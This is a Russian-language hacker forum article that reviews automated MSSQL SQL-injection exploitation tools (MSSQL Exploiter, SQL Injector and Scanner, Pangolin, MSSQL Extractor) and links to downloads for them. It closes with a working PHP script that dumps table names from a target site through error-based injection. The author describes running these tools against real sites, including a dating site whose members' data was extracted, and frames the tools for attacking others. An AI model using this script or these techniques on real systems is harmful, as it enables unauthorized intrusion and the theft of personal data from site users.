| RSS



Меню

Bookmark and Share


Статистика
Ваш IP: 3.129.71.13
Вы используете: v





Сейчас на сайте:

Тех поддержка ->

Облако тэгов
ОС видио Tor Обратная сторона антенна 4.6 php libc rand() эксплоит Windows Server 2008 FreeBSD Jail Elastix QIP Virtual chroot Limit kernel proc sysctl Tune freeBSD bridge Boot LiveCD Disk Bluetooth GEO game DirectX emulator Python Shell червь Conficker вирус троян лаборатория касперского пиратство Apple iPhone Microsoft twitter социальная сеть анонимность лицензия Open Source уязвимость MySQL база данных Закон Франция Пират Skype мобильный Deutsche Telekom хакер trend micro кибератака Германия робот Персональные данные Ноутбук Интернет китай цензура windows vista acer Linux патент браузер Firefox Internet Explorer Opera Safari Intel Oracle патч Банкомат IBM США Dell Ford MAC контроль Internet кибербезопасность приговор Mozilla Chrome безопасность Госдума СМИ Windows 8 взлом Пентагон Украина Facebook Cisco Cloud Windows XP нетбук торрент музыка Биометрический Nokia Hardware Manager ФБР IP-адрес sms RSA java Google Captcha Symantec Спам Антивирус тест Anti-Malware Windows 7 операционная система windows провайдер авторское право rapidshare UNIX свиной грипп шантаж Дети ipod копирайт McAfee HTTPS icann студент Норвегия New York Times YouTube Warner Music КНДР Ubuntu AMD ATI касперский Россия РФ сервер хостинг Wi-Fi суд пароль блог фишинг одноклассники Медведев контрафакт мошенник sony Gps по JavaScript Хакеры Yahoo фас компьютер софт Минкомсвязи Сбой мошенничество Доктор ВЕб Вконтакте ie8 исходный код МВД фильтр порнография свобода слова казахстан Autodesk сисадмин Gmail кредитная карта LiveJournal шифрование Deep Purple банк HTML5 Нанотехнологии wikipedia выборы DNS bind KaZaA Android Basic атака Mac OS X домен ФСБ прокуратура уголовное дело ICQ Sophos Google Voice ошибка DARPA военные сайт турция конференция спамер Полиция Koobface Великобритания IRC белоруссия Грузия Bittorrent Европа Dr.WEB Linux Mint Билл Гейтс спецслужбы Royal Bank of Scotland смартфон Canonical F-Secure Symbian фильм Microsoft Office Новая Зеландия Adobe Австралия IDC Internet Explorer 9 iPad Ирландия поиск GOOGLE EARTH МТС Реклама слежка Mandriva BSD Zeus личные данные eset avast Avira G Data Software защита Defcon виртуализация dll LibreOffice Черный список BlackBerry индия Москва DVD социальные сети flash player paypal BitDefender email сертификат honda MasterCard Anonymous технологии IPv6 Ассанж Оптоволокно передача данных арест Fedora Samsung Иск Apache учетная запись iTunes исследование Cert Санкт-Петербург McDonald's SOPA PIPA Bioshock Infinite: Burial at Sea - ico Megaupload CES hotfile отчет приложение Инвестиции платформа DRM DDoS-атака роскомнадзор

Главная » Статьи » Общие Статьи

Обзор автоэксплойтеров под MSSQL

Всем известно, что ручной перебор имен таблиц и полей через сообщение об ошибке вывода MSSQL дело муторное, и требующее не дюжего терпения. Однажды я два дня перебирал только названия таблиц известного сайта shop.private.com, после того как обнаружил на нем инъекцию. И уже тогда ко мне в голову закралась мысль, где бы найти автоматический эксплойтер под MSSQL, и вот теперь я хочу поделиться с вами результатами моих поисков и самое главное, дать объективную и непредвзятую характеристику существующим продуктам.

MSSQL Exploiter

Скачат: http://axf.watchfire.com/extensions/Exploiter-1.0-Bin.zip или http://hack-shop.org.ru/download_files/Exploiter.rar

Видео по работе с ним: http://download.watchfire.com/ExploiterDemo/index.htm

Несмотря на хороший интерфейс, возможности программы прямо скажем сильно ограничены. Она корректно распознает только идеальные инъекции, которых с каждым днем становится все меньше и меньше.

Ко всему этому следует добавить то, что сам видеоролик, показывающий работу программы, не совсем точен, поэтому если следовать его советам, то проэксплойтить не удастся даже идеальную инъекцию. Что бы разобраться, какие именно параметры вводить для успешного эксплойтинга, придется попотеть, перехватывая и анализирую трафик, отправляемый MSSQL Exploiter-ом на уязвимый сайт.

Резюме: проще все сделать руками, чем данной софтом. Но для любителей нетрадиционного секса с хак-тузлами, MSSQL Exploiter как раз то, что нужно.

SQL Injector and Scanner

Скачать: http://www.priamos-project.com/versions.htm

Тут же можно скачать asp­скрипт, на котором можно потестить тузлу, а по ссылке ниже посмотреть видео по работе с ней.

Видео: http://www.priamos-project.com/demo.htm

SQL Injector and Scanner кроме того, что может автоматически эксплойтить MSSQL, так же может и искать уязвимые к инъекции скрипты в заданной директории. Большим плюсом является интуитивно понятный интерфейс и отлично оформленный визуально вывод информации о найденных базах, таблицах и полях. Кроме того, имеется возможность сохранения результатов вывода данных в Excel, что очень приятно.

Но есть и существенные недостатки: работает тузла не на всех инъекциях, у меня она определяла реально 25% от уже найденных инъекций в MSSQL. Второй существенный негативный момент в том, что SQL Injector and Scanner обнаружив уязвимость, не всегда выводит всю имеющуюся в базе информацию, а так же очень часто, определив названия таблиц, не может вывести названия полей. А уж вывод информации из полей вообще редкая удача.

Резюме: лучше чем ничего, во всяком случае часть информации вы точно получите. SQL Injector and Scanner плюс голова с руками, и MSSQL откроет перед вами все свои секреты.

Pangolin

Ознакомится с данным продуктом, а также посмотреть видео-демонстартрацию его работы: http://nosec.org/en/pangolin.html

Приятный интерфейс и простота обращения с ней не может не радовать, а количество поддерживаемых БД вызывает бурный восторг: MySQL, MSSQL, Oracle, Sybase, DB2, Access, Informix, PostgreSQL, SQLite.

 Единственным мало приятным моментом является то, что за полнофункциональную версию Pangolin китайские товарищи хотят не много ни мало 9000$, а Free версия Pangolin поддерживает всего лишь работу с MSSQL и Access.

Но даже работа урезанной фриварной версии оставляет хорошее впечатление. Тест показал, что Pangolin смог вытащить структуру таблиц и полей у большей половины скормленных ему инъекций.

Кроме того, есть очень неплохая русскоязычная статья по использованию Pangolin, ознакомится с ней ты можешь по этому адресу:  http://raz0r.name/obzory/pangolin-sql-inekcii-teper-ne-utomlyayut/

Резюме: респект китайским товарищам за качественно сделанный продукт, однозначно Pangolin должен быть в наборе каждого уважающего себя искателя MSSQL инъекций. А пока ждем доброго спонсора, который купит полнофункциональную версию и поделится ей.

MSSQL Extractor

Существует еще очень толковый автоэксплойтер MSSQL от cash’а выполненный на php, раньше доступный для работы на его сайте http://hack-shop.org, но в данный момент сайт закрыт. Но как известно из неформальных источников, исходники MSSQL Extractor были переданы cash’ем нескольким людям, поэтому ждем, когда они выставят его для общего пользования. Работа с MSSQL Extractor оставила у меня самые теплые воспоминая, и хотя софт не был лишен недостатков – иногда выводил не все таблицы и поля - зато он не требовал ничего, кроме браузера и Интернета.

Резюме: пока о MSSQL Extractor говорить смысла нет. Но может бы те, у кого есть исходники MSSQL Extractor, выставят рабочую версию в Интернет для всеобщего пользования... Это намек :).

Еще

Ну и на последок, бесплатный и простой автоэксплойтер MSSQL от хорошего человека, известного под ником eraflame. Для его работы тебе будет нужен любой сервер с поддержкой php:

<?php
echo "Дампаем таблицы:\n";
$link="http://xxx.com/info.php?id=1'+or+1=(SELECT+TOP+1+table_name+FROM+information_schema.tables)--";
$fp=file_get_contents($link);
if(preg_match("#nvarchar value '(.*?)' to a colum#",$fp,$r))
//Текст ошибки придется подбирать под свой случай.
{echo $r[1]."\n";}
for($i=1;$i<100;$i++) {
$link="http://xxx.com/info.php?id=1'+or+1=(SELECT+TOP+1+table_name+FROM+information_schema.tables+WHERE+table_name+NOT+IN+(SELECT+TOP+$i+table_name+FROM+information_schema.tables))--";
$fp=file_get_contents($link);
if(preg_match("#nvarchar value '(.*?)' to a colum#",$fp,$r))
//Текст ошибки придется подбирать под свой случай.
{echo $r[1]."\n";}
}
?>

Он предельно прост и неприхотлив в эксплуатации, единственный его минус - придется под каждый скуль-инжект его править. Хотя с другой стороны, какой это минус, ведь ты зато будешь полностью уверен, что автоэксплойтер не передает найденную тобой уязвимость своим разработчикам, каким-нибудь хитрым китайским хакерам.

И еще, не всегда есть возможность выполнения второго подзапроса, но раскрутка 80-90% MSSQL инъекций превратятся для тебя в сплошное удовольствие. Единственный момент: если на сервере большее 1500-2000 таблиц то работа скрипта под конец существенно замедляется, а иногда MSSQL уходит в даун, но таких баз я не встречал.

Так что выбор за тобой.

P.S. Ну и на последок совет - если ты используешь автоэксплойтеры, никогда до конца не доверяй их результатам, так как они часто пропускают некоторые таблицы и поля. У меня была ситуация, когда MSSQL Extractor упорно не выводил таблицу users в одном известном датинге, и я долго ломал голову, где лежат данные мемберов. В итоге я натравил на сайт Pangolin, он тоже умудрился пропустить пару таблиц, но таблицу users обнаружил, и проблема с датингом была решена. Поэтому мой совет - перепроверяй данные, выданные тебе автоэксплойтерами и будет тебе счастье.

Категория: Общие Статьи | Добавил: LeadyTOR (29.09.2009)
Просмотров: 1799 | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
    Главная      
...
На службе : дней

14:54
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск


Copyright tHR - TeAM 2025 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, ... Яндекс.Метрика